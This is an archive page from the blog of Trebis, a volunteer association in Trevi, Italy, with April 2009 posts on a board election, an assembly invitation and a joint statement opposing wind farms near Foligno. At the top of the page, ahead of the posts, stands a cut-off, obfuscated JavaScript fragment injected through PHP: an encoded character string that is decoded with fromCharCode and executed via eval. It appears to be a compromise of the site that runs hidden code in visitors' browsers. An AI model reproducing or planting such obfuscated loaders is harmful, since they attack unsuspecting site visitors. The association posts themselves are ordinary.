q4Zq1Zq72Zq4Zq1Zq60Zq5dZq1fZq3eZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq70Zq6aZq61Zq5aZq67Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74\"[gzr](\"Zq\");}uwo=cpf;uoukoc=[];for(ymg=22-20-2;-ymg 1420!=0;ymg =1){ubtze=ymg;if((0x19==031))uoukoc =pivr.fromCharCode(eval(xcf uwo[1*ubtze]) 0xa-nhmv);}ilqz=eval;if(Math.ceil(5.5)===6)ilqz(uoukoc)}";echo $x;} ?>

Archive for Aprile, 2009

Nuovo Consiglio direttivo

admin Aprile 21st, 2009

L’assemblea del 17 aprile 2009 ha eletto il nuovo consiglio direttivo. Ecco l’esito della votazione:

Presidente: Patricia Clough
Vice-Presidente: Maurizio Falcinelli
Segretario: Paolo Natalini
Tesoriere: Maria Pia Barbini
Membri: Rita Cerioni
Vito Trombetta
Gianni Furiani

Il consiglio si riunirà il 5 maggio per programmare il lavoro per i prossimi mesi.

–>

ANCORA ATTACCHI AL PAESAGGIO

admin Aprile 16th, 2009

DOPO LA DISTRUZIONE DELLA PIANURA E L’ATTACCO ALLA COLLINA CON UNA URBANIZZAZIONE SELVAGGIA ORA E’IL MOMENTO DELLA MONTAGNA

Italia Nostra Onlus Sezione di Foligno e l’Associazione Trebis di Trevi sono contrarie alla proposta di realizzare un impianto industriale di energia prodotta dal vento in località Monte Morro, Monte Santo Stefano e zone limitrofe in un’area che presenta un elevato grado di naturalità e valori estetico-paesaggistici con la presenza di specie animali e vegetali con priorità di conservazione e di tutela, area di particolare interesse naturalistico ed ambientale ai sensi dell’art. 14 della L.R. 24 Marzo 2000, n° 27.

L’impatto visivo, senza parlare poi della rumorosità, dell’impianto industriale sarebbe disastroso essendo l’opera ben visibile in quanto realizzata in area ad alta esposizione panoramica, area tra l’altro esclusa dal Piano territoriale di coordinamento della Provincia di Perugia per la localizzazione di impianti eolici.

L’eolico, come ormai è noto, è un business per chi costruisce gli impianti e li gestisce con i certificati verdi, un affare che poco o nulla ha a che vedere con la lodevole volontà di ridurre l’inquinamento, in quanto trattasi allo stato attuale di una fonte energetica che può essere solo considerata di integrazione alla produzione tradizionale.

Infatti, l’eolico produce energia (quando poi la produce, visto che in l’Italia è uno dei Paesi meno ventosi del mondo sia per intensità che per continuità) in modo discontinuo senza possibilità di accumulo e quindi da consumarsi immediatamente.

Inoltre, l’eolico potrebbe coprire al massimo un 6% del fabbisogno energetico nazionale, percentuale che è facilmente raggiungibile con una sana politica di risparmio energetico, senza distruzione del paesaggio montano e dei suoi delicati ecosistemi e senza compromettere il valore economico legato al turismo.

La richiesta è della società INERGIA e il progetto, che prevede l’istallazione di n° 7 aerogeneratori, può essere visionato presso i Comuni di Foligno, Trevi, Sellano, Campello sul Clitunno e Serravalle del Chienti.

Altra società la EHN ITALY ha presentato istanza per altro impianto industriale eolico con l’istallazione di ben 19 aerogeratori in località Faeto a ridosso dell’altopiano di Colfiorito già oggetto di altre quattro istanza di impianti industriali eolici il cui progetto può essere visionato presso il Comune di Foligno, Valtopina e Nocera Umbra.

Quindi, per comprendere la gravità e l’impatto sul paesaggio e sull’ambiente, in qualche Kmq della montagna di Foligno dovrebbe insistere ben sei impianti industriali eolici con tutte le loro infrastrutture (strade, cabine, pali,….).

Italia Nostra Onlus Sezione di Foligno Gianfranco Angeli

Associazione Trebis di Trevi Giancarlo Izzo

–>

Assemblea aprile 2009

admin Aprile 8th, 2009

E convocata l’assemblea generale dell’Associazione per venerdi 17 aprile 2009 alle ore 21 nella sala dell’impresa Olio Trevi (dietro il Cityper) gentilmente messa a nostra disposizione dal Socio Angelo Guidobaldi. Si proseguirà alle elezione del nuovo Consiglio Direttivo e al tesseramento per l’anno 2009.

Segue la lettera d’invito dal Presidente Giancarlo Izzo che sarà spedito anche per posta a tutti i soci.

“Cari Soci,
il Consiglio Direttivo della nostra Associazione scade il prossimo 13 Aprile. Risulta pertanto necessario indire nuove elezioni che si terranno nel corso dell’Assemblea generale dei Soci convenuta per venerdi 17 aprile 2009 alle ore 21,00 nella sala dell’impresa Olio Trevi (dietro il Cityper) gentilmente messa a nostra disposizione dal socio Angelo Guidobaldi.

Invito caldamente tutti i Soci a partecipare a questo importante evento ricordando che, in caso di assenza, e’ possibile dare una delega ad un’altra persona che parteciperà all’Assemblea.

Desidero anche invitare tutti coloro che siano interessati a candidarsi per il Consiglio Direttivo della Trebis, di usare il nostro sito web www.trebisonlus.it o di rivolgersi direttamente a Paolo Baliani, che cura il sito, all’indirizzo info@trebisonlus.it  oppure per telefono al 348 8740994. Con l’occasione suggerirei, ai candidati che lo volessero fare, di presentare le proprie idee in un “programma” con l’impegno di dare la propria disponibilità a partecipare in modo continuativo ai lavori del Consiglio Direttivo in modo da permettere a tutti i Soci di valutare al meglio le candidature.

Prima delle votazioni, intenderei presentare un breve resoconto sulle attivita’ svolte dall’Associazione negli ultimi due anni invitando tutti i soci, in particolare a coloro che intendessero candidarsi, a partecipare ad una discussione sulle linee guida delle future attività della Trebis proponendo nuove idee e strategie, e cercando di correggere gli errori e le mancanze che si sono evidenziate in questi primi due anni di vita dell’Associazione, senza sottostimare il problema delle risorse finanziare che, per un’Associazione di volontari come la Trebis, può contare soltanto su un’espansione del tesseramento ed un regolare pagamento della quota che, anche per l’anno in corso, sara’ di 10 Euro.

Saro’ molto lieto di potervi incontrare il prossimo 17 aprile e desidero approfittare dell’occasione per augurare a tutti una Buona Pasqua. “

Giancarlo Izzo

–>